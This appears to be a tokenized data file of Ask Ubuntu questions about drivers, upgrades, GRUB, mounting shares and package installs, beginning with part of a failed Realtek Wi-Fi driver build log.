/home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:404:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` sec_info '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:412:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` mlmext_state '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:420:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` qos_option '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:427:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ht_option '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:434:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_info '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:441:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ap_info '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:448:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` adapter_state '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:455:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` trx_info '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:462:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` mac_reg_dump1 '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:469:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` mac_reg_dump2 '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:476:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` mac_reg_dump3 '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:483:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` bb_reg_dump1 '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:490:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` bb_reg_dump2 '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:497:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` bb_reg_dump3 '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:504:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_reg_dump1 '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:511:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_reg_dump2 '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:520:9 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_reg_dump3 '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:527:9 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_reg_dump4 '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:537:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` all_sta_info '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:555:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` best_channel '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:561:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_best_channel ; ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:564:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rx_signal '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:570:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_rx_signal ; ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:572:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ht_enable '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:578:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_ht_enable ; ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:580:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` cbw40_enable '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:586:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_cbw40_enable ; ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:588:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ampdu_enable '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:594:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_ampdu_enable ; ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:596:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rx_stbc '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:602:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_rx_stbc ; ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:605:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` path_rssi '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:608:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` vid '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:615:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` pid '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:622:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rssi_disp '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:628:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_rssi_disp ; ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:631:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` sreset '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:637:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_sreset ; ^ cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.o ] error 1 make [ 1 ] : *** [ _module_/home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 ] error 2 make [ 1 ] : se sale del directorio «/usr/src/linux-headers-3.11.0-15-generic» make : *** [ modules ] error 2 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # compile make driver error : 2 please check error mesg # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ruben @ ruben-hp-elitebook-8440p : ~/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 $
408041	ubuntu 12.04.3 will automatically update to 12.04.4 and to kernel 3.11 ?	i do n't know if ubuntu 12.04.3 will automatically update , and if the kernel updates too . thanks .
408044	if i install ubuntu , do i need to install specific drivers ?	recently i got a very old pentium 4 windows machine and it did n't have any sound drivers . i tried looking for them and after i found them i could n't install them . i was thinking of moving to ubuntu but i 'm not sure whether i will need to install the sound drivers on it too ? if i have to install drivers , i would rather keep windows because finding drivers for such an old machine will be hard .
408048	i need help switching back to windows	i have ubuntu 12.04 right now . for reasons i would like to switch back to windows 7 . ( even though i love ubuntu . ) i was wondering if anyone could point me in the direction of a guide on how to do this ? i do not want to keep ubuntu . i have a flash drive and an external hard drive and i can use either or for the boot . i would like to wipe the whole computer to use windows 7 , i also have the product key for it . any feedback is great , thanks .
408049	move apt keyrings from /etc/apt/trusted.gpg to /etc/apt/trusted.gpg.d	i 'd like to reorganize all apt keys that i manually added and moved them to their own keyring file in /etc/apt/trusted.gpg.d . how do i go about this without redownloading those keys ?
408050	libreoffice writer does not show `` file '' , `` edit '' , etc . in standard toolbar/taskbar	it shows some of the captions like `` help '' . i tried to uninstall using sudo apt-get purge libreoffice* and then reinstall first using command prompt and then using ubuntu software centre . it did not work . now i have uninstalled it . but this is a very important software as abiword can not work with .docx as efficiently as libreoffice . problem started when i tried to install themes and icons with noobslab.com and removed the theme and icons afterwards along with gnome tweak tool . i also cleaned the computer with gnome tweak tool 's janitor . please help !
408051	ubuntu gnome creates ~/videos , ~/desktop and ~/public every boot	my ubuntu gnome install creates the folders ~/videos , ~/desktop , and ~/public on every boot . i do not need these folders and they are cluttering up my home directory . what program does this ? how can i prevent this ? system info : ubuntu gnome 13.10 ( 64 bit ) gnome shell 3.8.4 linux 3.11.0-15-generic # 23-ubuntu
408056	looking for software related to media	so i have synfig ... i like it ... not what i 'm looking for . i need a basic tool that i can use to create kinetic typography , plus , it has to easily run under wine or be native to ubuntu . it must also be free . any software that anyone knows about ?
408057	can i change the keyboard shortcut for opening the application lens ?	i just installed ubuntu 13.04 and i am liking the lens options . however , super+a is a little uncomfortable for me when doing something as common as opening an application . is there any way i can change the shortcut to open the application lens to alt+spacebar ? thanks !
408059	my ubuntu is stuck at loading splash screen during shutdown i need help	when i hit shut down on my screen ( im using ubuntu 12.04 with gnome classic ) it goes to the loading screen and just sits there like its loading and never shuts down . i have left it and went to the store and came back and it was still like that . i hit f8 and/or ctrl+t and saw this at the top of the screen : could not write bytes : broken pipe saned disabled ; edit /etc/default/saned i dont know where to begin to fix it . i have looked at forums and came up with nothing . please help me !
408062	launcher missing upon full install of 13.10	i downloaded the iso from the ubuntu website . converted it to a bootable usb . appears to work fine in trial mode but when installed into 2 different pcs the launcher is missing . all i have is a blank startup screen . i am able to obtain a terminal by using cntrol/alt/t . no clue here . help ?
408066	why does n't ubuntu 12.04 upgrade libreoffice , as firefox ?	i use ubuntu 12.04 in a machine for working , and do n't know why libreoffice does n't upgrade to last version , and firefox does .
408067	installing ububtu on hp pavillion 15-e034tx	i am using hp pavilion 15-e034tx.i have already installed windows 8 in it.i have to install ubuntu on my laptop alongside with windows.but when i am loading bootcd to install ubuntu it will show running on low graphics and furhter progress wont happen . my laptop is installed with amd radeon hd 8670m ( 1 gb ddr3 dedicated ) graphics card.i think its problem with this graphics card.please help me to install ubuntu
408068	applications lens is all empty in my ubuntu 13.10 dash	i tried unity -- reset , it showed this option is deprecated or some sort of similar things , basically it did n't work , i tried unity-reset-icons and restart , did n't work either . it was working fine after installation just fine , but then i wanted to try gnome 3.10 which i did and did n't like so i reverted back , ppa-purged the gnome3-next and gnome3-staging repos , ppa-purge of gnome repo was not successfull don ; t know why , anyways then i got rid of gnome , but soon realized after restart that i do n't have any desktop env at all , so using recovery i did sudo apt-get install unity ( after enabling networking ) and it worked , i got back my unity but since then applications lens is all empty , searching for eclipse , gedit , codeblocks gives empty result in applications sections . is sudo apt-get install unity enough or i need to install some other pkgs also . i just want to be able to see the list of all installed apps in dash app lens . any suggestions or help will be really appreciable .
408069	log usb connect and disconnect in ubuntu 13.x	is it possible to log usb connect and disconnect in ubuntu 13.x ? also it will be excellent if it could log the connect/disconnect and email to some email address . is there any program for that ? is it possible with some scripting ? if yes please let me have an idea of doing it .
408070	my bootable usb of ubuntu is showing some command	i have disabled the uefi mode . i tried to install ubuntu alongside pre-installed windows8 withbootable pendrive and after boot from the pendrive some sort of black screen appears , on top of which it is written `` grub2 '' .now it is asking me to type command and i do n't know what to do . there is also written for commands press tab . please help me ! i really want to install ubuntu ,
408071	13.10 : mount error ( 6 ) : no such device or address - when mounting same path as nautilus	if i mount my nas samba share through nautilus and check the device both with the properties but also by looking in : /run/user/1000/gvfs i see that the address should be `` //rt-ac68u-5251.local/backups.backupdb '' . for example in the above directory i have : afp-volume : host=rt-ac68u-5251.local , user=admin , volume=backups.backupdb but if i try to mount with : sudo mount -t cifs //rt-ac68u-5251.local/backups.backupdb /mnt/raid -o username=admin , password= '' mypassword '' , rw , nounix , iocharset=utf8 , file_mode=0777 , dir_mode=0777 , sec=ntlm i get the following error : retrying with upper case share name mount error ( 6 ) : no such device or address refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) i can ping and use the ip number directly and i still get an error ... . sorry , i 'm a bit stuck and would love some advice ? thanks dan
408075	trying to boot from install cd gives error	i 'm trying to install linux 13.10 desktop onto my old sony vaio vgn-s580p . i 've also tried 12.4.3 . both have given me the same error which references nouveau_perf_init . i 've read that this has to do with conflicts with a nvidia graphics card . i have the geforce go 6400 . however i ca n't find anywhere what to actually do to fix the problem . i have a screenshot of the error but i do n't see a way to post it here .
408076	update-grub does n't help boot new kernels on external drive	i asked a question in ubuntu forum which has not been solved yet : http : //ubuntuforums.org/showthread.php ? t=2200335 & page=2 to recap briefly , i have an external drive that i boot from different systems . when i have downloaded some newer kernels , i have not been able to get grub2 to give me a menu option to boot the newest kernel . sudo update-grub seems to do what it is supposed to . i see a reference to every install on both the internal drive ( sda ) and the external drive ( sdb ) . when i run $ sudo grub-install /dev/sdb the output i get is : source_dir does n't exist . please specify -- target or -- directory i do n't want to simply grub-install on /dev/sda , i want to update the grub on the external drive so that i can boot from other systems -- into the newest kernel . surely this is easy to do when one knows how . i do n't know why it will not work with the two commands shown above though .
408077	how to to use gcc with lapack and external header file ?	i am trying to run a c program that uses an external header file with lapack and lblas libraries , every time when i try to run the program i get an error lapack not found , how do i properly use the libraries to run the program . ubu @ sanjay-pc : ~ $ ./code *** glibc detected *** ./code : free ( ) : invalid next size ( normal ) : 0x08f64eb8 *** ======= backtrace : ========= /lib/i386-linux-gnu/libc.so.6 ( +0x75ee2 ) [ 0xb6cf4ee2 ] /usr/lib/libblas.so.3gf ( atl_dtrsmklunn+0x603 ) [ 0xb6ad8973 ] ======= memory map : ======== 08048000-0804a000 r-xp 00000000 08:0c 697362 /home/ubu/code 0804a000-0804b000 r -- p 00001000 08:0c 697362 /home/ubu/code 0804b000-0804c000 rw-p 00002000 08:0c 697362 /home/ubu/code 08f30000-08f72000 rw-p 00000000 00:00 0 [ heap ] b57cb000-b57cc000 -- -p 00000000 00:00 0 b57cc000-b5fcc000 rw-p 00000000 00:00 0 b5fcc000-b5fcd000 -- -p 00000000 00:00 0 b5fcd000-b67ce000 rw-p 00000000 00:00 0 b67ce000-b6840000 r-xp 00000000 08:0c 5026 /usr/lib/i386-linux-gnu/libquadmath.so.0.0.0 b6840000-b6841000 r -- p 00071000 08:0c 5026 /usr/lib/i386-linux-gnu/libquadmath.so.0.0.0 b6841000-b6842000 rw-p 00072000 08:0c 5026 /usr/lib/i386-linux-gnu/libquadmath.so.0.0.0 b6842000-b6843000 rw-p 00000000 00:00 0 b6843000-b685a000 r-xp 00000000 08:0c 689952 /lib/i386-linux-gnu/libpthread-2.15.so b685a000-b685b000 r -- p 00016000 08:0c 689952 /lib/i386-linux-gnu/libpthread-2.15.so b685b000-b685c000 rw-p 00017000 08:0c 689952 /lib/i386-linux-gnu/libpthread-2.15.so b685c000-b685e000 rw-p 00000000 00:00 0 b685e000-b687a000 r-xp 00000000 08:0c 656309 /lib/i386-linux-gnu/libgcc_s.so.1 b687a000-b687b000 r -- p 0001b000 08:0c 656309 /lib/i386-linux-gnu/libgcc_s.so.1 b687b000-b687c000 rw-p 0001c000 08:0c 656309 /lib/i386-linux-gnu/libgcc_s.so.1 b687c000-b697a000 r-xp 00000000 08:0c 10434 /usr/lib/i386-linux-gnu/libgfortran.so.3.0.0 b697a000-b697b000 r -- p 000fe000 08:0c 10434 /usr/lib/i386-linux-gnu/libgfortran.so.3.0.0 b697b000-b697c000 rw-p 000ff000 08:0c 10434 /usr/lib/i386-linux-gnu/libgfortran.so.3.0.0 b697c000-b697d000 rw-p 00000000 00:00 0 b697d000-b6c4e000 r-xp 00000000 08:0c 41489 /usr/lib/atlas-base/atlas/libblas.so.3gf.0 b6c4e000-b6c52000 rw-p 002d1000 08:0c 41489 /usr/lib/atlas-base/atlas/libblas.so.3gf.0 b6c52000-b6c7c000 r-xp 00000000 08:0c 690058 /lib/i386-linux-gnu/libm-2.15.so b6c7c000-b6c7d000 r -- p 00029000 08:0c 690058 /lib/i386-linux-gnu/libm-2.15.so b6c7d000-b6c7e000 rw-p 0002a000 08:0c 690058 /lib/i386-linux-gnu/libm-2.15.so b6c7e000-b6c7f000 rw-p 00000000 00:00 0 b6c7f000-b6e23000 r-xp 00000000 08:0c 691765 /lib/i386-linux-gnu/libc-2.15.so b6e23000-b6e25000 r -- p 001a4000 08:0c 691765 /lib/i386-linux-gnu/libc-2.15.so b6e25000-b6e26000 rw-p 001a6000 08:0c 691765 /lib/i386-linux-gnu/libc-2.15.so b6e26000-b6e29000 rw-p 00000000 00:00 0 b6e29000-b75f0000 r-xp 00000000 08:0c 41490 /usr/lib/atlas-base/atlas/liblapack.so.3gf.0 b75f0000-b75f4000 rw-p 007c6000 08:0c 41490 /usr/lib/atlas-base/atlas/liblapack.so.3gf.0 b75f4000-b7701000 rw-p 00000000 00:00 0 b7719000-b771c000 rw-p 00000000 00:00 0 b771c000-b771d000 r-xp 00000000 00:00 0 [ vdso ] b771d000-b773d000 r-xp 00000000 08:0c 689978 /lib/i386-linux-gnu/ld-2.15.so b773d000-b773e000 r -- p 0001f000 08:0c 689978 /lib/i386-linux-gnu/ld-2.15.so b773e000-b773f000 rw-p 00020000 08:0c 689978 /lib/i386-linux-gnu/ld-2.15.so bfc14000-bfc35000 rw-p 00000000 00:00 0 [ stack ] aborted
408078	wireless networking disabled by hardware switch . unblock only wifi ?	i am using ubuntu 12.04. when i do sudo rkill list all , i get : 0 phy0 : wireless lan ( soft and hard blocked : no ) 1 brcmwl-0 : wireless lan ( soft and hard blocked : no ) 2 dell-wifi : wireless lan ( both soft and hard blocked : yes ) 3 dell-bluetooth : bluetooth ( both soft and hard blocked : yes ) now i want to enable only dell-wifi on , and want to keep dell-bluetooth blocked . i tried : sudo rfkill unblock dell-wifi sudo rfkill unblock wifi none of the above has any effect . i even restarted my laptop but still no effect . edit : even when i tried sudo rfkill unblock all , but it did n't work.. ! how should i do the same ? ?
408079	forever can not be installed	while trying to install forever using this command : sudo npm -g install forever i 'm getting this error : npm warn engine hawk @ 0.10.2 : wanted : { `` node '' : '' 0.8.x '' } ( current : { `` node '' : '' v0.10.24 '' , '' npm '' : '' 1.3.21 '' } ) npm warn engine sntp @ 0.1.4 : wanted : { `` node '' : '' 0.8.x '' } ( current : { `` node '' : '' v0.10.24 '' , '' npm '' : '' 1.3.21 '' } ) npm warn engine hoek @ 0.7.6 : wanted : { `` node '' : '' 0.8.x '' } ( current : { `` node '' : '' v0.10.24 '' , '' npm '' : '' 1.3.21 '' } ) npm warn engine boom @ 0.3.8 : wanted : { `` node '' : '' 0.8.x '' } ( current : { `` node '' : '' v0.10.24 '' , '' npm '' : '' 1.3.21 '' } ) npm warn engine cryptiles @ 0.1.3 : wanted : { `` node '' : '' 0.8.x '' } ( current : { `` node '' : '' v0.10.24 '' , '' npm '' : '' 1.3.21 '' } ) npm http 304 https : //registry.npmjs.org/delayed-stream/0.0.5 /home/ali/express/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/mobile/titanium_studio/ [ sudo ] password for ali : /home/ali/mobile/titanium_studio/ [ sudo ] password for ali : /usr/bin/forever - > /home/ali/express/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/mobile/titanium_studio/ [ sudo ] password for ali : /home/ali/mobile/titanium_studio/ [ sudo ] password for ali : /usr/lib/node_modules/forever/bin/forever /home/ali/express/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/mobile/titanium_studio/ [ sudo ] password for ali : /home/ali/mobile/titanium_studio/ [ sudo ] password for ali : /usr/bin/foreverd - > /home/ali/express/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/mobile/titanium_studio/ [ sudo ] password for ali : /home/ali/mobile/titanium_studio/ [ sudo ] password for ali : /usr/lib/node_modules/forever/bin/foreverd forever @ 0.10.11 /home/ali/express/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/ [ sudo ] password for ali : /home/ali/mobile/titanium_studio/ [ sudo ] password for ali : /home/ali/mobile/titanium_studio/ [ sudo ] password for ali : /usr/lib/node_modules/forever ├── watch @ 0.8.0 ├── colors @ 0.6.2 ├── pkginfo @ 0.3.0 ├── timespan @ 2.3.0 ├── nssocket @ 0.5.1 ( eventemitter2 @ 0.4.13 , lazy @ 1.0.11 ) ├── optimist @ 0.6.0 ( wordwrap @ 0.0.2 , minimist @ 0.0.5 ) ├── nconf @ 0.6.9 ( ini @ 1.1.0 , async @ 0.2.9 ) ├── utile @ 0.2.1 ( deep-equal @ 0.1.2 , rimraf @ 2.2.6 , ncp @ 0.4.2 , mkdirp @ 0.3.5 , i @ 0.3.2 , async @ 0.2.9 ) ├── forever-monitor @ 1.2.3 ( watch @ 0.5.1 , utile @ 0.1.7 , minimatch @ 0.2.14 , ps-tree @ 0.0.3 , broadway @ 0.2.9 ) ├── cliff @ 0.1.8 ( eyes @ 0.1.8 , winston @ 0.6.2 ) ├── flatiron @ 0.3.11 ( director @ 1.1.10 , broadway @ 0.2.9 , prompt @ 0.2.11 ) └── winston @ 0.7.2 ( cycle @ 1.0.3 , stack-trace @ 0.0.7 , eyes @ 0.1.8 , async @ 0.2.9 , request @ 2.16.6 ) and ubuntu generating recursive sudo directories with permission denied although i 'm using sudo to run my command .
408086	ubuntu apt update stuck at setting up mime-support	i have ubuntu 13.10 64bit the last update was installed by ubuntu stuck at this point : setting up mime-support ... and a process called update-mime keeps eating the memory , for example i have 8 gb ram once the process start a 6.5 gb will be reserved after 10 min . any help will be appreciated .
